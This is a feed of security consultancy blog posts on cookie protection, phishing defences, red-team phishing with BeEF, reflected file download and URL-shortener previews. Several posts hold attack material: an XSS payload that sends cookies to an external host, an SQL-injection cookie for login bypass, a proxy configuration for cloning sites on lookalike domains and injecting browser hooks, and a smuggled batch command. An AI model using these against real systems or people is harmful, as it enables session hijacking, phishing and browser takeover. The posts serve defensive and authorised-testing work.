Portcullis Labs » phishing https://labs.portcullis.co.uk Research and Development en-US hourly 1 http://wordpress.org/?v=3.8.5 Keep your cookies safe (part 2) https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/ https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/#comments Thu, 15 Feb 2018 20:31:26 +0000 https://labs.portcullis.co.uk/?p=3960 In the first blog post we talked about the dangers that your cookies are exposed. Now it is time to keep your cookies safe. Time to know what protection mechanisms there are, how to use them and why. How to read this post? The flowchart below will guide you to the process to check if […]

The post Keep your cookies safe (part 2) appeared first on Portcullis Labs.

]]>
In the first blog post we talked about the dangers that your cookies are exposed. Now it is time to keep your cookies safe. Time to know what protection mechanisms there are, how to use them and why.

How to read this post?

The flowchart below will guide you to the process to check if your cookies are well protected. Note that there are more factors and cases that could potentially compromise your cookies (as we talked in the part 1 of the blog post).

Of course at the end of the post you will find the explanation to the flowchart. So if you do not understand anything, do not panic! Look for the question in the last part of the blog where it will be explained.

flowchart about securing cookies
image-3961

A flowchart about how to get your cookies better secured.

Is your session cookie different before and after login?

  • Correct answer: Yes, if your unique session ID cookie is different after and before login, your session is correctly protected against Session Fixation attacks
  • Incorrect answer: No, your unique session ID cookie is the same, if an attacker managed to stole your cookie before login into the web application, then once you are authenticated the attacker could also access the application

Recommendation: Session ID should be changed after and before user logs in.

Are you invalidating the session when the user logs out?

  • Correct answer: Yes, once the user has logged out, the session must be destroyed or invalidated
  • Incorrect answer: No, if you do not destroy the session ID in server side, the session will continue being valid

Recommendation: Session must be invalidated after the user logs out.

Does your cookie have the attribute “HttpOnly”?

  • Correct answer: Yes, your cookie is only accessible via http and not via JavaScript
  • Incorrect answer: No, your cookie is also accessible via JavaScript , which in case of an attacker compromise your application with a Cross-site Scripting, it could access to your cookie

Recommendation: Set the cookie as “HttpOnly”.

Does your cookie have the full domain attribute set?

  • Correct answer: Yes, your cookie is only being sent to the correct domain where it is needed
  • Incorrect answer: No, your cookie can be sent to the multiple sub-domains you could have

Recommendation: The full domain of the cookie must be specified.

Does your cookie have an adequate lifetime?

  • Correct answer: Yes
  • Incorrect answer: No, Cookies with an excessive lifetime will not be deleted when the user closes their browser and would therefore be exposed should an attacker manage to compromise the user’s system

Recommendation: Use cookies without a lifetime so that they are deleted once the user closes their browser or lower its lifetime to meet business requirements.

Do you have only one web application in the same domain?

What does this question mean? The following is an example of multiple web applications in the same domain:

  • www.mydomain.com/app1
  • www.mydomain.com/app2
  • www.mydomain.com/app3

There is not a correct answer to this question.

If you only have one application running over the same domain, you should not need to care about this issue. However if you host multiple web applications, you need to set the attribute “path” of the cookie to ensure that the cookie is only being sent to the web application it belongs.

Are your cookies NOT storing sensitive information?

  • Correct answer: Yes, my cookies do not contains sensitive information
  • Incorrect answer: No, there are some sensitive information in the cookies

Recommendation: Ensure that sensitive information is not stored in the cookies.

Does your web application support HTTPS?

If the answer to this question is NO, you are sending all the data through a plain text protocol. An attacker able to intercept network traffic between a user’s session and the web server could capture the sensitive data being transmitted.

If the answer is YES, there is some other question you need to answer before know if you are protecting correctly your cookies:

Does your web application use HTTP + HTTPS (mixed content)?

If the answer is NO, it means that HTTP is not allowed and all the data is being sent over HTTPS. Although your cookie is secure in this case, you need to be careful if you enable HTTP.

If the answer is YES you need to answer one more question:

Is HSTS (HTTP Strict Transport Security) enabled or has the cookie the attribute “secure”?

If you have HSTS enabled, you are forcing all the data being sent over HTTPS (cookies included).

If the cookie has the attribute “secure”, you are forcing the cookie to be sent only over HTTPS.

Recommendation: Set the cookie as “secure” and consider to enable HSTS.

The post Keep your cookies safe (part 2) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-2/feed/ 0
A study in scarlet https://labs.portcullis.co.uk/blog/a-study-in-scarlet/ https://labs.portcullis.co.uk/blog/a-study-in-scarlet/#comments Thu, 20 Jul 2017 12:28:58 +0000 https://labs.portcullis.co.uk/?p=5917 In the modern age, where computers are used for nearly everything we do, the damage that can be caused to a company by cyber-attacks is substantial, with companies losing millions in regulatory fines, compensation and declining share prices. While some of these breaches have been caused by vulnerabilities within the target company’s infrastructure/software, a large […]

The post A study in scarlet appeared first on Portcullis Labs.

]]>
In the modern age, where computers are used for nearly everything we do, the damage that can be caused to a company by cyber-attacks is substantial, with companies losing millions in regulatory fines, compensation and declining share prices. While some of these breaches have been caused by vulnerabilities within the target company’s infrastructure/software, a large quantity of them began with a phishing attack.

Generally speaking, phishing is a social engineering technique that involves sending fraudulent emails to individuals in an attempt to coerce them into providing confidential information or network access. Spear phishing is a more targeted form of this, where attackers will target specific individuals within an organisation and use information gathered from publicly available resources, such as social media, to make the malicious emails seem more genuine. This attack technique is very effective, with previous research showing victims being up to 4.5 times more likely to believe the contents of targeted emails. Additionally, targeting specific individuals with more access within an organisation, such as managers or system administrators, gives the attacker a greater chance of finding sensitive information than that provided by standard phishing.

The best defence against phishing attacks is to have employees that are aware of the threat and the methods of identifying them. That being said, it’s important to support your employees in this effort, minimising risk and the potential for human error, which is why employers should be doing everything they can to ensure that the emails do not reach their targets and, when they do, that they are easy to identify and report. This can be achieved by looking at the cyber kill chain, as documented by Lockheed Martin, and implementing sensible security controls at each of the stages that relate specifically to a phishing attack.

Delivery

The first part of the cyber kill chain where we can actively identify these attacks is at the delivery stage – when a malicious email hits the external mail server of an organisation. The following security controls can be put in place at this stage of an attack to identify and mitigate the majority of phishing attacks.

Mail content scanning

The most obvious place to search for indicators of a phishing attempt is the content of the emails themselves. By analysing information gathered about common attacks used by malicious actors, it is possible to identify potential phishing attacks before they reach the intended target. The contents of these emails can then be modified to make it easier for users to identify them.

As attackers use phishing as a method of gaining unauthorised access to systems or data, a common attack vector is to include a hyperlink to a web application that they control. Modern mail clients capable of rendering HTML emails make this attack method even more effective, as attackers are able to change the text that is displayed to the user in place of the hyperlink. To help the user identify the threat and limit the risk of this method of attack, hyperlinks should be rewritten to display to the user where their browser will take them if they click on the link.

As phishing attempts will generally come from a network location external to their intended targets, another very simple but effective method of improving a user’s likelihood of identifying a phishing attack is the addition of a warning to the email, stating that it is from an external user. Users seeing that emails have come from an external location are much more likely to exercise caution when following hyperlinks.

Attachments

Malicious attachments sent via phishing email are a very real and dangerous threat as, at worst, they could allow an attacker to bypass all external protections and provide them with direct access to a company’s internal network. The most secure method to avoid the risk of this threat would be to block all email attachments coming into a company, however, for the majority of businesses this is not practical and would severely limit their ability to communicate with clients/third-parties. The following security controls can help to mitigate the potential damage that could be caused by malicious attachments:

  • File rewrite – a number of security solutions on the market are able to convert files into a safe format, for example, rewriting a Microsoft Docx file into a PDF so that no Macros can be executed
  • Moderator review – One very effective method of mitigating this threat is to hold all emails from external addresses that contain attachments in a quarantine system until they have undergone administrator review. This will allow them to examine the contents of the emails to determine whether or not they are malicious
  • Password protected attachments – As security solutions have no feasible way of decrypting password protected files, there is no way of automatically validating the whether or not their content is malicious. Due to this, it is important to make sure they are either blocked from entering your organisation or, if there is a business requirement for such attachments, at a minimum they should undergo sandboxing or moderator review

Domain names

A common attack technique used to trick users into providing sensitive information is to use a domain that is close to a company’s legitimate domain. In order to counter this type of attack, security solutions can be employed to review how similar a sending domain is to the company’s legitimate domain, blocking emails from all domains that are above a certain level of similarity.

Another attack technique that has been discussed a large amount recently is the use of Internationalised Domain Names (IDN). IDNs are domain names that contain at least one character that is not within the normal ASCII character set. In order to facilitate this, domains can be registered as specially formatted ASCII strings, which are preceded by the characters “xn--”. This representation is what is actually registered with domain providers and is called Punycode. Using IDNs, attackers can register domains that look very similar to legitimate sites by changing ASCII characters for Unicode characters (e.g. www.goógle.com could be registered using the Punycode www.xn--gogle-1ta.com). As these IDN domains are actually registered using the Punycode for the domain name, mitigating the threat of this attack technique can be achieved by blocking all domain names that begin with the characters “xn--”.

A further way of using a domain to identify malicious activity is to analyse what it appears to be used for. A number of security solutions on the market assign categories to domains, usually based on analysis of the services running on the systems (e.g. the content that is hosted on a web server). Using these solutions, it is also possible to report domains that have been identified as being used in phishing or other malicious activities. As the majority of these solutions operate using a cloud based central server, once a domain has been marked as malicious it will be impractical for attackers to use it in further attacks. Additionally, as attackers are unlikely to want to have their personal details registered to accounts for use in these services, it is likely that they will be unable to have their domains categorised when they set up their phishing. Blocking emails from domains that are not yet categorised can be just as effective at ensuring that phishing attempts do not reach their target.

Email validation

The wide range of open source software available to us makes it simple to set up and use a mail server for a domain of our choosing. This, however, provides attackers with the opportunity to send emails as if they were coming from a legitimate site – name@yourcompanynamehere.com for example. A number of technologies are available that will help to ensure that attackers are not able to spoof emails in this way:

  • Sender Policy Framework (SPF) – SPF is an email validation system which allows domain administrators to define the hosts that are allowed to send emails for their domain, through the use of a specially formatted DNS TXT record:
An example SPF record entry
image-5918

An example SPF record entry

  • Domain Keys Identified Mail (DKIM) – DKIM also uses a specially formatted DNS TXT record to validate the sender of an email, through the use of public/private key cryptography. The sending mail server adds a digital signature to outgoing emails, which can be verified using a public key that is published within the DNS record. This email validation method also provides data integrity for the emails, as any alterations made in transit will affect the validation of the digital signature.
An example DKIM signature in an email header
image-5919

An example DKIM signature in an email header

  • Domain-based Message Authentication, Reporting and Conformance (DMARC) – DMARC takes the 2 validation systems defined above and builds on them to create a much more robust system. It allows domain administrators to define which validation systems are to be used by mail servers for the domain (either SPF, DKIM or both) and how mail servers should handle emails that do not pass the validation process.

By utilising these security controls and ensuring that our receiving mail server is checking the DNS records against the information in emails, we are able to ensure that attackers are unable to spoof emails from legitimate domains.

Malicious email reporting

If a malicious email does manage to get through all of the security controls at the perimeter, it is likely that at least some of their intended targets will fall for the scam. With that in mind, it is important that users have a method of notifying the people responsible for the security of your organisation that a malicious email has slipped through the net. Multiple solutions for this are available, such as the creation of a plugin for the company mail client or a mailing list that is used to report malicious emails. In tandem to this, policies and procedures should be put into place, which detail the process administrators and security staff should follow to inform employees that there is a phishing attack underway and how to identify it.

Mail client plugin
image-5920

Mail client plugin

Exploitation, installation and command & control

A number of security controls can be used to mitigate the threat of phishing attacks across the next 3 stages of the cyber kill chain – Exploitation, Installation and Command & Control. If an attack has managed to progress this far along the cyber kill chain it is imperative that it is identified and stopped to ensure that the attacker is not able to gain a foothold on an internal network.

End point protection

The most obvious method of blocking malicious applications from running on a target user’s system is to install an End Point Protection application. There are a number of options for this on the market, each of them able to detect and protect against millions of variants of malware and other unwanted applications. These products can help to stop an attack at either the Exploitation or Installation stages of the cyber kill chain by identifying and blocking malicious files/activity.

Outbound proxies

A common method of attack used in phishing attempts is to provide a link within the email that, when followed, will display a page asking for credentials or other sensitive information. In order to stop attackers using this technique, a network proxy can be used to block traffic to unknown domains. One possible solution to this issue is to only allow access to the top ranked sites, however, for some organisations this may not be practical. In situations such as this, a moderator/administrator should review any unknown domains to ensure that they are not malicious.

In addition to mitigating the threat of users disclosing sensitive information, these solutions can help to break the cyber kill chain at the installation and command & control (C2) stages, by stopping malware from using HTTP connections to unknown domains to download Remote Access Tools (RATs) or as a C2 channel.

Sandboxing

Sandboxing is the practice of using a system that is not connected to the live network (usually a virtual machine) to test files for malicious activity. As most attachments used in phishing attacks will have similar behaviour (e.g. connecting back to a command & control node) after being opened, sandboxing can be used to identify them within a safe environment to ensure that no live systems are affected. By using sandboxing technologies we can analyse the behaviour of files against indicators of malicious activity at all three of the stages of the kill chain.

Threat intelligence

While having all of the security solutions described above can help to identify and mitigate the threat of phishing attacks, the individuals behind the attacks are always developing and adapting their methodologies. Taking this into account, it is of utmost importance that the indicators of attack that we are looking for evolve with them. By feeding any information gathered from previous attacks into cloud-based threat intelligence platforms, the security community’s understanding of how attackers are operating will grow, which will in turn improve our ability to stop them.

Summary

While the threat of phishing attacks and the damage they can do is significant, both financially and to a company’s reputation, by looking at the timeline of these attacks it is possible to identify many security controls that can be used to mitigate them. By utilising these controls, through a defence-in-depth approach to security, we are able to limit the number of malicious emails that reach their targeted users. Furthermore, by using information about recognised indicators of attack, we are able to alter the contents of emails to assist users in the identification of emails and content that could potentially cause a security breach.

The post A study in scarlet appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/a-study-in-scarlet/feed/ 0
Keep your cookies safe (part 1) https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/ https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/#comments Fri, 22 Apr 2016 15:03:32 +0000 https://labs.portcullis.co.uk/?p=3605 What are cookies and why are they important? A cookie is a small piece of data sent from a web site and stored in a user’s web browser and is subsequently includes with all authenticated requests that belong to that session. Some cookies contain the user session data in a web site, which is vital. […]

The post Keep your cookies safe (part 1) appeared first on Portcullis Labs.

]]>
What are cookies and why are they important?

A cookie is a small piece of data sent from a web site and stored in a user’s web browser and is subsequently includes with all authenticated requests that belong to that session. Some cookies contain the user session data in a web site, which is vital. Others cookies are used for tracking long-term records of an individuals browsing history and preferences such as their preferred language. Sometimes they are also used for tracking and monitoring a user’s activities across different web sites.

Due to the fact that HTTP is a stateless protocol, the web site needs a way to authenticate the user in each request. Every time the user visits a new page within a web site, the browser sends the users cookie back to the server, allowing the server to serve the correct data to that individual user, which is tracked using a session ID. Cookies therefore play an integral part in ensuring persistence of data used across multiple HTTP requests throughout the time a user visits a web site.

What does a cookie look like?

Set-Cookie: __cfduid=d8a3ae94f81234321; expires=Mon, 23-Dec-2019 23:50:00 GMT; path=/; domain=.domain.com; HttpOnly

The cookie below is an example of a common cookie generated for WordPress. Here we break down each part of the cookie and explain what it is used for:

  • Set-Cookie – the web server asks the browser to save the cookie with this command
  • __cfduid=d8a3ae94f81234321;: This is the cookie itself. At the left of the equals symbol is the name of the cookie and to the right is its value
  • expires=Mon, 23-Dec-2019 23:50:00 GMT; – this is the date and time when the cookie will expire
  • path=/; domain=.domain.com; – the cookie domain and path define the scope of the cookie. They tell the browser that cookies should only be sent back to the server for the given domain and path
  • HttpOnly – this attribute (without a value associated) tells the browser that JavaScript cannot be used to access the cookie, which must only be accessed through HTTP or HTTPS. Sometimes you will also see the attribute “Secure”, which prevents the cookie being sent over the unencrypted HTTP protocol (i.e. the cookie will only be transmitted over HTTPS)

What is the impact of having your cookies compromised?

A traditional and important role of a cookie is to store a users session ID, which is used to identify a user. If this type of cookie is stolen by a malicious user, they would be able to gain access to web site as the user for which the cookie belonged to (i.e. the malicoius user would have access to your account within the web site).

In the case of the tracking cookie, the malicious user would have access to your browsing history for the web site.

Another problem arises when sensitive data is stored in cookies, for example a username, and this is also a vector for server side exploitation if its contents are not properly validated, which can potentially lead to serious vulnerabilties such as SQL Injection or remote code execution.

What are the main cookie threats?

cookie monster image

Cookie Monster.

There are different attacking vectors in which obtaining and modifying cookies can occur, leading to session hijacking of an authenticated user session, or even SQL injection attacks against the server. These threats may take place when an attacker takes control of the web browser using Cross-site Scripting, or Spyware, in order to obtain a users SessionID cookie that can then be used by an attacker to impersonate the legitimate user, as shown in the following example:

Obtaining access to the cookie can be as easy as using the following JavaScript line:

document.cookie

Imagine that the web site has a search form that is vulnerable to Cross-site Scripting (Reflective Cross-site Scripting in this case).


http://myweb.com/form.php?search=XSS_PAYLOAD_HERE

An attacker could use the following payload to send the cookie to an external web site:

<script>location.href='http://external_web site.com/cookiemonster.php?c00kie='+escape(document.cookie);</script>

The final step would be to send the vulnerable link to an admin and wait for them to click on it. If the attacker uses an URL shortener, this allows for further obfuscation of the malicous URL, as the admin will be unable to see the content of the link they have been sent.

An attacker able to read files from a given user may also attempt to retrieve the cookies stored in files from a system. Furthermore some browsers store persistent cookies in a binary file that is easily readable with existing public tools.

Security weaknesses may also reside server side when cookies are modified, if input validation routines are not adequately implemented. The example below shows how to bypass the authentication process:

//In /core/user.php: (cs cart vulnerability)

if (fn_get_cookie(AREA_NAME . '_user_id')) {
 $udata = db_get_row("SELECT user_id, user_type, tax_exempt, last_login, membership_status, membership_id FROM $db_tables[users]
 WHERE user_id='".fn_get_cookies(AREA_NAME . '_user_id')."' AND password='".fn_get_cookie(AREA_NAME . '_password')."'");
 fn_define('LOGGED_VIA_COOKIE', true);

}

//Cookie: cs_cookies[customer_user_id]=1'/*;

For their role, cookies are really important and may be used in different attacks.

Now that you are more aware of the dangers, it would be wise to ensure steps are taken to deploy web site cookies safely and securely. Look out for the second part of this post!

The post Keep your cookies safe (part 1) appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/keep-your-cookies-safe-part-1/feed/ 0
Blood in the water: Phishing with BeEF https://labs.portcullis.co.uk/blog/blood-in-the-water-phishing-with-beef/ https://labs.portcullis.co.uk/blog/blood-in-the-water-phishing-with-beef/#comments Fri, 18 Sep 2015 09:53:47 +0000 https://labs.portcullis.co.uk/?p=4939 Those of you that have been following the UK infosec market recently will have noticed an upturn in talk relating to “Red Team” style engagements. Unlike a traditional penetration test, the object of such an exercise is not to locate vulnerabilities (though of course that helps) but rather to exercise the “Blue Team” i.e. the […]

The post Blood in the water: Phishing with BeEF appeared first on Portcullis Labs.

]]>
Those of you that have been following the UK infosec market recently will have noticed an upturn in talk relating to “Red Team” style engagements. Unlike a traditional penetration test, the object of such an exercise is not to locate vulnerabilities (though of course that helps) but rather to exercise the “Blue Team” i.e. the internal users at an organisation responsible for defending their network. This change has been driven by CBEST and the associated STAR exam offerings from CREST, which have certainly raised the bar. Whilst most IT security consultancies are happy to talk about phishing, the level to which they go to mimic the target can vary.

Historically, the Portcullis offering has, whilst bespoke been more about gathering statistics as to how many victims clicked a given link than much else. With this in mind, over the last 12 months, I’ve set about developing our service in a more agressive direction. One particular idea I’ve wanted to deliver for a while is to integrate BeEF into our offering. As an aside, for those of you that don’t know of BeEF, it allows you to hook web site vistors and turn them into drones. This allows for longer term exploitation of their browsers including fingerprinting and even RCE enabling OS level access to their PCs.

As I’ve already stated, Portcullis offer a bespoke phishing service where we tailor the web site and email to the particulars of our client. For a start we will perform reconnaissance to locate a suitable legitimate web site to mimic and secondly we will work with our client to ensure that our emails aren’t caught by any anti-phishing technology they may be using (often the first point of failure when phishing a mature organisation). Typically, we will then mimic our chosen site on a similar looking domain before sending emails to our victims. Historically, we’ve statically cloned the legitimate site (or at least the portions we need) before tweaking them to add our hooks, however on a recent project, I took the opportunity to improve this. The reasons for the change were many and varied but essentially came down to the fact that a statically cloned site will never look as good as the real thing, notably with respect to the expected functionality a victim might expect to see, but also because the tweaks we will then have to make are quite time consuming. The aim of my improvements were therefore two-fold:

  • Allow dynamic web sites to be cloned
  • Integrate BeEF

Whilst I’ve previously looked, I’ve not found any information elsewhere that discusses how to do this in detail, so I decided to use Apache web server, mod_proxy and mod_substitute (tools I’m already familiar with). The remainder of this post discussed the approach I took.

Consider the following configuration:

        ServerName HOSTNAME.DOMAINNAME
        DocumentRoot /var/www/HOSTNAME.DOMAINNAME
        ...
        ProxyPass /pcslhook.js !
        ProxyPass /pcslendpoint.php !
        ProxyPass /hook.js http://localhost:3000/hook.js
        ProxyPassReverse /hook.js http://localhost:3000/hook.js
        ProxyPass /dh http://localhost:3000/dh
        ProxyPassReverse /dh http://localhost:3000/dh
        ProxyPass /ui http://localhost:3000/ui
        ProxyPassReverse /ui http://localhost:3000/ui
        ProxyPass / http://PLEASECOMPLETEME/
        ProxyPassReverse / http://PLEASECOMPLETEME/
        AddOutputFilterByType INFLATE;SUBSTITUTE;DEFLATE text/html
        AddOutputFilterByType INFLATE;SUBSTITUTE;DEFLATE text/javascript
        Substitute "s#<head>#<head><script type="text/javascript" src="\"/pcslhook.js\""></script><script type="text/javascript">load();</script><script type="text/javascript" src="\"/hook.js\""></script>#ni"
        Substitute "s#:3000##ni"
        Substitute "s#\"3000\"#\"80\"#ni"
        Substitute "s#@PLEASECOMPLETEME#@PLEASECOMPLETEME#ni"

We start off by defining the ServerName on line 2. This will typically be based on the domain name that we control e.g. if the organisation we are targeting is example.org, we might register example.com. We then configure the real web site on lines 12 and 13. Any request for example.com will therefore be rewritten and proxied by our web server instance to example.org. This means that, for example that if a victim performs a search on our web site, then requests for http://example.com/search?query=test will be relayed to http://example.org/search?query=test and the victim will get identical results to those they would have received on the legitimate web site. Finally, we inject BeEF on line 16. I’ve found that the best approach is to pick a unique snippet of HTML (one that appears only once in each page) and use this as the anchor for my substitution.

Whilst this forms the basis of our subterfuge, what of the other lines in our example configuration?

  • We use ProxyPass … ! when we want to process requests from our own web root (/var/www/HOSTNAME.DOMAINNAME)
  • We use ProxyPass … http://localhost:3000/… to proxy requests through to BeEF
  • We apply an output filter on all HTML and JavaScript returned by the real web site to allow for the substitutions
  • We substitute out 3000 towards the end, as from an external perspective BeEF is on the same port as everything else
  • We substitute out the legitimate domain in any email addresses the real web site may return

It should be noted, that a similar approach can be taken to pass requests through to Metasploit and other exploitation frameworks.

This concludes our brief example. If you enjoyed it, feel free to borrow and if you think you or your users might be susceptible, please feel free to give us a call.

PS /pcslhook.js and /pcslendpoint.php are our secret sauce, not that we ever call them that.
PPS You should probably use Location “/ui” to limit who can access the BeEF administration panel.

The post Blood in the water: Phishing with BeEF appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/blood-in-the-water-phishing-with-beef/feed/ 0
You can’t even trust your own reflection these days… https://labs.portcullis.co.uk/blog/you-cant-even-trust-your-own-reflection-these-days/ https://labs.portcullis.co.uk/blog/you-cant-even-trust-your-own-reflection-these-days/#comments Wed, 05 Nov 2014 17:37:34 +0000 https://labs.portcullis.co.uk/?p=4794 Recently, researchers at Trustwave’s SpiderLabs spoke at Black Hat Europe on the dangers of simply reflecting data back to the requesting user as part of an HTTP request/response exchange. When you think about it, this stands to reason, after all, it’s what Cross-site Scripting attacks are born from. What’s interesting is that the new research […]

The post You can’t even trust your own reflection these days… appeared first on Portcullis Labs.

]]>
Recently, researchers at Trustwave’s SpiderLabs spoke at Black Hat Europe on the dangers of simply reflecting data back to the requesting user as part of an HTTP request/response exchange. When you think about it, this stands to reason, after all, it’s what Cross-site Scripting attacks are born from. What’s interesting is that the new research discussed another way in which it could be exploited.

The basic premise of the attack (as described on SpiderLabs’s Reflected File Download whitepaper) is as follows:

  1. The user follows a malicious link to a trusted web site
  2. An executable file is downloaded and saved on the user’s machine. All security indicators show that the file was hosted on the trusted web site
  3. The user executes the file which contains shell commands that gain complete control over the computer

So how does it work? On a recent engagement, one of our consultants found a similar issue. In their case, it was a stored variant of the issue SpiderLabs describe but in other regards, it was identical. The consultant discovered that the application they were testing used two APIs that allowed for the storage and retrieval of data, like so:

POST /putData HTTP/1.0
...
{"id":12345, "input":"asdf||calc.exe||pause"}

This data could then be retrieved using the following URL:

  • http://URL/getData/12345;1.bat

Requesting this in a browser results in the browser believing that the user has downloaded what appeared to be a batch file called 12345;1.bat. If the user executes this file, then calc.exe (part of our original input) will be executed.

As with other similar attacks, which exploit variances in how user controlled data is treated by different components of a solution (in this case, the browser and the server), once you know what to watch out for, it’s fairly easy to mitigate.

Specifically:

  • Validate all user input
  • Sanitise by means of context sensitive encoding/escaping any user input that remains
  • Avoid wildcard mappings such as /getdata/* on exposed web services
  • Ensure that you’re correctly setting the important HTTP headers such as Content-Type and Content-Disposition (and other related headers such as X-Content-Type-Options) so that direct requests for the URL cause the file to be downloaded

This last point is particularly important, browsers will often attempt to automatically render downloaded content using whatever application is rendered for the target file type. Sending a Content-Disposition header of:

attachment; filename=1.txt

precludes this, as no matter whether it is saved or opened, it will be treated as text, a relatively safe file type.

All in all, a nice catch and one we’ll definitely use in our red team engagements.

The post You can’t even trust your own reflection these days… appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/you-cant-even-trust-your-own-reflection-these-days/feed/ 0
URL shorteners: What link are you really clicking? https://labs.portcullis.co.uk/blog/url-shorteners-what-link-are-you-really-clicking/ https://labs.portcullis.co.uk/blog/url-shorteners-what-link-are-you-really-clicking/#comments Wed, 08 Jan 2014 06:40:41 +0000 https://labs.portcullis.co.uk/?p=2705 URL shorteners are a main-stay of Internet use these days, helping users to cut down unsightly long URLs to concise links that can be easily shared. Social media has helped to fuel the popularity of the various services available, but how do you know if you can trust the link you’re clicking? I’ve always been […]

The post URL shorteners: What link are you really clicking? appeared first on Portcullis Labs.

]]>
URL shorteners are a main-stay of Internet use these days, helping users to cut down unsightly long URLs to concise links that can be easily shared. Social media has helped to fuel the popularity of the various services available, but how do you know if you can trust the link you’re clicking? I’ve always been wary of shortened links and decided I’d take a look at how you can check what it is you’re actually clicking on.

It’s worth noting that there are numerous browser extensions that will attempt to lengthen short URLs in-situ. While this is probably works well most of the time, it could be open to exploitation (if the extension is coded badly) or subversion. One piece of functionality I’ve seen in such an extension was to replace the link with the meta data title for the page. This doesn’t really help if the link leads you to a convincing looking phishing site, complete with fake meta-data.

I’ve picked out a sample of what seem to be the most popular shortening services. They are (in no particular order):

  • bit.ly
  • tinyurl.com
  • goo.gl
  • is.gd
  • tiny.cc
  • ow.ly

I’ve come up with this list as a result of a quick search and those I’ve had previous experience with. There are a couple of notable exclusions from the list such as t.co and fb.me, the services run by Twitter and Facebook respectively. I’ve excluded these (as well as others) as they’re only used by themselves.

Twitter’s shortener, t.co, is only accessible when using twitter it seems and doesn’t provide any kind of dedicated front-end to view information for a given link. It does however replace some of the text in-line and provides the original URL in the link title which you can see by hovering over the URL.
Facebook’s version seems a little… undocumented. I couldn’t find a great deal of information on it other than it seems to be used largely for mobile users and (from what little I checked) is only used for linking back to Facebook. One feature I did find however was that it can be used to link to any Facebook page given its alias. For example, fb.me/PortcullisCSL.

I’ve also only chosen services which are free to use and for obvious reasons I’m excluding any that you can create using your own domain (Coke has one for example – cokeurl.com).

For this post, we’re going to use https://labs.portcullis.co.uk as our long URL to put through the shorteners.

Here’s a list of how our shortened links come out and the associated ways of previewing the actual destination:

Service Short link Preview link
bit.ly http://bit.ly/2cx5kA http://bit.ly/2cx5kA+
tinyurl.com http://tinyurl.com/nt79ln4 http://preview.tinyurl.com/nt79ln4
goo.gl http://goo.gl/cgc0Wb http://goo.gl/#analytics/goo.gl/cgc0Wb/all_time
is.gd http://is.gd/ObGfiX http://is.gd/ObGfiX-
tiny.cc http://tiny.cc/43z67w http://tiny.cc/43z67w~
ow.ly http://ow.ly/rObWZ Couldn’t find a way to expand the URL.

In summary; bit.ly, is.gd and tiny.cc all have nice simple ways of taking a look, you just have to add a character onto the end (providing you pick the right one). Google’s service seems like the most complicated requiring the knowledge of the correct runes, and I couldn’t find a way to preview ow.ly.

When writing this post, I was pointed at a bit of quick Perl that Tim wrote a little while ago to assist in a test which will follow a short link and print out each redirect it encounters along the way. This is particularly useful if your chosen link leads you to yet another URL shortener service.

#!/usr/bin/perl

use strict;
use LWP;

my $url;
my $redirectflag;
my $httphandle;
my $requesthandle;
my $responsehandle;

sub usage {
        die "usage: " . basename($0) . " ";
}

if (@ARGV != 1) {
        usage();
}
$url = shift;
$httphandle = LWP::UserAgent->new(max_redirect => 0);
$httphandle->agent("Mozilla/5.0 (compatible; resolveurl.pl 0.1)");
$redirectflag = 1;
while ($redirectflag == 1) {
        $redirectflag = 0;
        $requesthandle = HTTP::Request->new(HEAD => $url);
        $responsehandle = $httphandle->request($requesthandle);
        if ($responsehandle->is_redirect) {
                $url = $responsehandle->header("location");
                print $url . "\n";
                $redirectflag = 1;
        }
}

Lastly, I’ve decided to make a quick mention of adf.ly which was pointed out to me by a colleague. This is a service for presenting ads before sending users onto the end URL. From a quick look, there didn’t appear any way in which to preview the URL you were being sent to. Given that following one of their links will present you with a third party ad could have its own implications. But that’s for another post.

The post URL shorteners: What link are you really clicking? appeared first on Portcullis Labs.

]]>
https://labs.portcullis.co.uk/blog/url-shorteners-what-link-are-you-really-clicking/feed/ 0